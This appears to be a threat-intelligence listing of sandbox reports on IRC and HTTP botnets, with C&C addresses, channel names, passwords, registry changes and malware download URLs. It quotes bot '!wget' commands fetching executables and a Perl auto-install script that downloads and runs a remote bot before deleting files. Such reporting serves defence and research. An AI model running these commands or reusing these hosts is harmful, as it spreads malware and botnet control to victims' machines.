DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.8.2 flash.quickupdates.net 46.4.232.76 www.whatismyip.com www.whatismyip.com 72.233.89.200 checkip.dyndns.org checkip.dyndns.org 91.198.22.70 Download URLs http://72.233.89.200/ (www.whatismyip.com) http://72.233.89.200/ (www.whatismyip.com) http://91.198.22.70/ (checkip.dyndns.org) http://91.198.22.70/ (checkip.dyndns.org) C&C Server: 46.4.232.76:5337 Server Password: Username: blaze Nickname: {iNF-00-DEU-XP-DELL-1855} Channel: #join (Password: error) Chanel: #irape Chanel: #b Channeltopic: :.aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -rRead more...
b.wrzdns.com(botnet hosted with Russian Federation Navitel Rusconnect Ltd)
– DNS Queries: Name Query Type Query Result Successful Protocol b.wrzdns.com DNS_TYPE_A 195.162.69.158 YES udp 195.162.69.158:1726 Nick: {N}|AUT|XP|pc9|554622 Username: lerzri Server Pass: (null) Joined Channel: #b# Channel Topic for Channel #b#: “D http://www.yanille.com/SetupYanilleMMO.exe”
irc.Vicio-Latino.Org(botnet hosted with United States Miami Fdcservers.net)
Connecting to 76.73.100.211 (8067) chanel:##Private##
ccteam.rox.net(botnet hosted with South Africa Johannesburg Global Web Intact T/a Screamer Telecoms)
Connecting to 41.57.133.155 (6667) chanel:#Establish Invisible Users: 1405 Operators: 1 operator(s) online Channels: 17 channels formed Clients: I have 787 clients and 1 servers Local users: Current Local Users: 787 Max: 916 Global users: Current Global Users: 1430 Max: 1725
195.162.68.118(botnet hosted with Russian Federation Navitel Rusconnect Ltd)
Remote Host Port Number 195.162.68.118 7777 PASS google_x1[s7_4]rk-h.tmp NICK {N}|USA|XP|COMPUTERNAME|192671 USER vsqcdz “” “lfjx” :COMPUTERNAME JOIN #nonamefase PRIVMSG #nonamefase :New Servant. Now talking in #nonamefase Modes On: [ #nonamefase ] [ +smntu ] (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !wget http://shoponline.muji.fr/images/sss.exe (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !!wget http://www.rummagu.com/burnbuddy.exe (niname) !!wget http://www.rummagu.com/burnbuddy.exe (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !msn Boot yourRead more...
videosalegria.com(malware hosted with Brazil Comite Gestor Da Internet No Brasil)
DNS Lookup Host Name IP Address 0 127.0.0.1 videosalegria.com videosalegria.com 187.17.98.13 UDP Connections Remote IP Address: 127.0.0.1 Port: 1066 Send Datagram: 115 packet(s) of size 1 Recv Datagram: 115 packet(s) of size 1 Download URLs http://187.17.98.13/red.swf (videosalegria.com) Outgoing connection to remote server: videosalegria.com TCP port 80DNS Lookup Host Name IP Address 0 127.0.0.1 www.youtube.com www.youtube.comRead more...
crocusfeerst.com(malware hosted with Netherlands Amsterdam Yisp)
DNS Lookup Host Name IP Address crocusfeerst.com crocusfeerst.com 109.235.48.186 Opened listening TCP connection on port: 21346 Outgoing connection to remote server: crocusfeerst.com TCP port 80 Outgoing connection to remote server: crocusfeerst.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftTihit “Ohyti” = [REG_BINARY, size: 116 bytes] HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerPhishingFilter “Enabled” = [REG_DWORD,Read more...
213.155.20.163(Kbot HTTP bot hosted with Ukraine Tehnologii Budushego Llc)
Panel here : http://213.155.20.163/new/auth.php DNS Lookup Host Name IP Address 213.155.20.163 213.155.20.163 Data posted to URLs http://213.155.20.163/new/stat.php (213.155.20.163) http://213.155.20.163/new/stat.php (213.155.20.163) Outgoing connection to remote server: 213.155.20.163 TCP port 80 Outgoing connection to remote server: 213.155.20.163 TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesmsupdate “ImagePath” = c:windowssystem32mssrv32.exe HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesmsupdate “DisplayName” = MicrosoftRead more...
irc.si.leet.la(linux bots hosted with Canada Iweb Dedicated Cl)
###################### my $server = “irc.si.leet.la”,”67.205.85.206″; my $port = “7000”; my $channel = “#mojok”; my $owner = “KaKuNg”; my $procname = “usr/sbin/php”; ###################### autoinstall script: ################################################################ #!/usr/bin/perl # # Auto install script by SuWunk # # created: Oktober 2010 # ################################################################ { system(“wget http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;lwp-download http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;curl -O http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;fetch http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;ftp http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;perl ts.txt irc.si.leet.la 7000 mojok KaKuNg;rm -rf *.txt”);Read more...
irc.123empe123.co.cc(botnet hosted with United States Missoula Sharktech Internet Services)
– DNS Queries: Name Query Type Query Result Successful Protocol irc.123empe123.co.cc DNS_TYPE_A 64.32.29.221 YES udp 64.32.29.221:6667 Nick: [AUT|00|P|90924] Username: XP-0641 Server Pass: pass Joined Channel: ##Galactic## with Password Anti-GaYs Channel Topic for Channel ##Galactic##: “http://www.windowscenter.net/descargas/msn.exe” Now talking in ##Galactic## Topic On: [ ##Galactic## ] [ http://www.windowscenter.net/descargas/msn.exe ] Topic By: [ RooTED[ON] ] Modes On: [Read more...